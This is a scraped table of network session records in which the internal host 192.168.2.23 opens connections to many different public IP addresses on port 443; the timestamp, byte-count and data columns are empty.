                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19698192.168.2.2333976160.126.99.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19699192.168.2.235777475.22.77.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19700192.168.2.2354652152.142.186.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19701192.168.2.235956485.2.219.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19702192.168.2.2348404218.164.221.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19703192.168.2.2354908150.243.131.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19704192.168.2.2335642121.241.5.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19705192.168.2.2341026176.233.70.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19706192.168.2.233635870.135.128.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19707192.168.2.2360244120.245.68.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19708192.168.2.2335698209.246.237.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19709192.168.2.2351516101.24.129.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19710192.168.2.235598045.231.171.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19711192.168.2.234968854.146.74.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19712192.168.2.2354946142.216.117.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19713192.168.2.235583238.108.65.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19714192.168.2.236083436.161.148.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19715192.168.2.234746289.192.85.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19716192.168.2.2359016145.108.67.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19717192.168.2.235638446.138.110.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19718192.168.2.2357422113.41.121.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19719192.168.2.2345828134.32.223.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19720192.168.2.2334352123.84.186.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19721192.168.2.2353458196.238.83.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19722192.168.2.2337782131.51.21.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19723192.168.2.234204240.160.59.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19724192.168.2.235962438.31.196.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19725192.168.2.2341654200.117.56.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19726192.168.2.2357350154.144.129.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19727192.168.2.234116098.122.40.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19728192.168.2.2337246141.115.56.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19729192.168.2.2334230157.97.94.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19730192.168.2.233737662.132.13.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19731192.168.2.2337474204.79.116.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19732192.168.2.2356860136.139.155.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19733192.168.2.2342154148.228.78.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19734192.168.2.233555413.132.171.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19735192.168.2.2338344184.119.119.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19736192.168.2.236041293.49.131.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19737192.168.2.236047038.200.219.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19738192.168.2.233347451.26.63.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19739192.168.2.235796618.118.81.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19740192.168.2.236020894.106.104.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19741192.168.2.2338104147.188.239.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19742192.168.2.23519404.28.57.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19743192.168.2.2334044172.211.153.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19744192.168.2.2333074203.125.175.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19745192.168.2.2333510205.145.185.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19746192.168.2.2354460157.128.0.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19747192.168.2.2336010114.70.65.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19748192.168.2.2351690184.89.53.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19749192.168.2.233532824.245.170.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19750192.168.2.235990279.118.64.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19751192.168.2.2336460183.44.119.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19752192.168.2.2357258223.117.89.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19753192.168.2.235605831.151.152.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19754192.168.2.2340016207.221.74.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19755192.168.2.2355078220.49.134.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19756192.168.2.2335766115.177.36.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19757192.168.2.2354968170.9.253.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19758192.168.2.2342252141.160.53.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19759192.168.2.2335778144.66.148.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19760192.168.2.2346268163.88.48.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19761192.168.2.235212236.55.92.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19762192.168.2.233998049.24.32.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19763192.168.2.2332958186.77.42.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19764192.168.2.233848034.37.78.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19765192.168.2.234483862.252.23.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19766192.168.2.2344750107.204.35.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19767192.168.2.235916660.193.71.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19768192.168.2.2348124193.220.184.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19769192.168.2.234175882.139.228.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19770192.168.2.2360804219.162.24.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19771192.168.2.2350636177.70.252.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19772192.168.2.234023825.31.100.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19773192.168.2.2351902210.18.98.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19774192.168.2.2356488107.182.169.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19775192.168.2.234135480.126.125.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19776192.168.2.2346812221.67.184.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19777192.168.2.234865479.63.198.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19778192.168.2.2333318142.188.59.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19779192.168.2.235383414.250.22.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19780192.168.2.234665434.243.192.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19781192.168.2.2340590151.3.117.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19782192.168.2.2355440165.216.144.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19783192.168.2.2345286128.23.94.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19784192.168.2.233944070.111.199.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19785192.168.2.2336358161.175.27.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19786192.168.2.2342896157.216.88.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19787192.168.2.2345444103.86.115.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19788192.168.2.2343062105.119.153.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19789192.168.2.235509069.75.63.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19790192.168.2.234462825.81.52.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19791192.168.2.235682240.235.23.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19792192.168.2.233773637.150.110.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19793192.168.2.234145240.237.6.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19794192.168.2.235556817.133.207.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19795192.168.2.23450121.142.206.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19796192.168.2.233782842.138.11.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19797192.168.2.2348868111.248.119.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19798192.168.2.2355048185.23.42.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19799192.168.2.2338386186.95.72.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19800192.168.2.233463218.74.91.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19801192.168.2.2351372195.190.143.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19802192.168.2.2353004171.197.39.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19803192.168.2.234413449.174.163.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19804192.168.2.2360298222.137.42.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19805192.168.2.2335288198.193.243.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19806192.168.2.235755878.93.253.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19807192.168.2.234094035.12.44.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19808192.168.2.2351816110.155.77.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19809192.168.2.2357618154.70.175.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19810192.168.2.234113845.32.147.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19811192.168.2.233826025.165.160.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19812192.168.2.234668043.24.125.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19813192.168.2.2358634163.155.1.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19814192.168.2.2348024136.151.86.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19815192.168.2.2340990192.28.56.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19816192.168.2.2355636126.77.58.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19817192.168.2.2355700140.125.68.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19818192.168.2.2353546112.113.80.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19819192.168.2.234733879.5.159.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19820192.168.2.2351876100.140.209.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19821192.168.2.2343526109.215.185.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19822192.168.2.2355866133.159.239.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19823192.168.2.233384442.99.165.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19824192.168.2.2355468209.116.21.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19825192.168.2.2358998221.31.108.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19826192.168.2.2352144107.232.192.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19827192.168.2.233430292.77.153.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19828192.168.2.2338120170.96.92.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19829192.168.2.233683819.68.93.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19830192.168.2.2333156108.222.50.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19831192.168.2.235203039.121.126.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19832192.168.2.2359672208.86.7.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19833192.168.2.234713250.249.150.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19834192.168.2.234447287.236.213.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19835192.168.2.2340398212.231.52.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19836192.168.2.2337390157.176.217.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19837192.168.2.2338932188.168.211.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19838192.168.2.2335268194.145.116.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19839192.168.2.2337440135.249.170.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19840192.168.2.2351432196.7.49.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19841192.168.2.2340846191.42.56.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19842192.168.2.2346208108.189.249.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19843192.168.2.234672263.255.145.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19844192.168.2.2342744160.245.23.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19845192.168.2.23435982.7.169.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19846192.168.2.235652290.17.48.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19847192.168.2.235263853.91.59.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19848192.168.2.233786838.51.6.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19849192.168.2.2357156183.19.25.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19850192.168.2.2355294155.2.49.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19851192.168.2.235749895.149.68.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19852192.168.2.235034645.21.94.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19853192.168.2.234519413.195.88.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19854192.168.2.235889817.242.145.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19855192.168.2.2354304166.32.195.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19856192.168.2.2349652163.106.201.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19857192.168.2.2351770174.245.198.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19858192.168.2.2360742209.116.56.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19859192.168.2.235244484.248.85.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19860192.168.2.2358430160.117.57.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19861192.168.2.233489692.62.58.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19862192.168.2.2355590148.253.174.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19863192.168.2.2356988153.16.251.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19864192.168.2.233354462.148.17.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19865192.168.2.233951035.15.254.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19866192.168.2.23473228.116.246.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19867192.168.2.234206282.34.149.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19868192.168.2.235735040.198.41.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19869192.168.2.2351238205.248.25.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19870192.168.2.235945675.205.56.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19871192.168.2.2360896173.73.243.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19872192.168.2.2349620116.47.24.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19873192.168.2.233322895.150.48.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19874192.168.2.234726478.119.167.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19875192.168.2.234799644.28.163.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19876192.168.2.235410263.165.220.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19877192.168.2.2360152107.209.77.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19878192.168.2.2340724114.174.10.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19879192.168.2.2359590176.193.30.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19880192.168.2.2352744135.241.104.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19881192.168.2.2345772184.230.219.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19882192.168.2.2350506120.1.222.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19883192.168.2.233539639.2.134.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19884192.168.2.2352206216.44.147.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19885192.168.2.2341758146.194.205.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19886192.168.2.2335760209.54.134.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19887192.168.2.2350338196.37.198.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19888192.168.2.2348464125.6.126.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19889192.168.2.2355176120.16.50.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19890192.168.2.235922058.170.116.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19891192.168.2.2355366192.85.95.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19892192.168.2.234310013.45.28.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19893192.168.2.236034417.249.232.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19894192.168.2.2343966112.176.214.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19895192.168.2.2355120177.200.232.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19896192.168.2.2347060120.205.170.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19897192.168.2.233549254.177.40.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19898192.168.2.235919074.199.224.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19899192.168.2.2354440161.244.120.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19900192.168.2.233391459.148.51.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19901192.168.2.2339574202.149.6.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19902192.168.2.234758034.178.55.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19903192.168.2.2349646193.254.232.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19904192.168.2.235027243.148.218.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19905192.168.2.2336604178.37.127.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19906192.168.2.235724280.6.56.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19907192.168.2.2333918178.94.210.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19908192.168.2.2334848176.253.191.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19909192.168.2.2357718148.179.51.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19910192.168.2.23511089.90.140.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19911192.168.2.2346220187.211.57.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19912192.168.2.2346600158.176.255.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19913192.168.2.2343084135.34.207.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19914192.168.2.233391019.23.144.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19915192.168.2.234811063.71.150.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19916192.168.2.233979258.122.148.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19917192.168.2.2352800114.222.25.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19918192.168.2.2340700147.66.110.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19919192.168.2.2357424203.81.186.235443
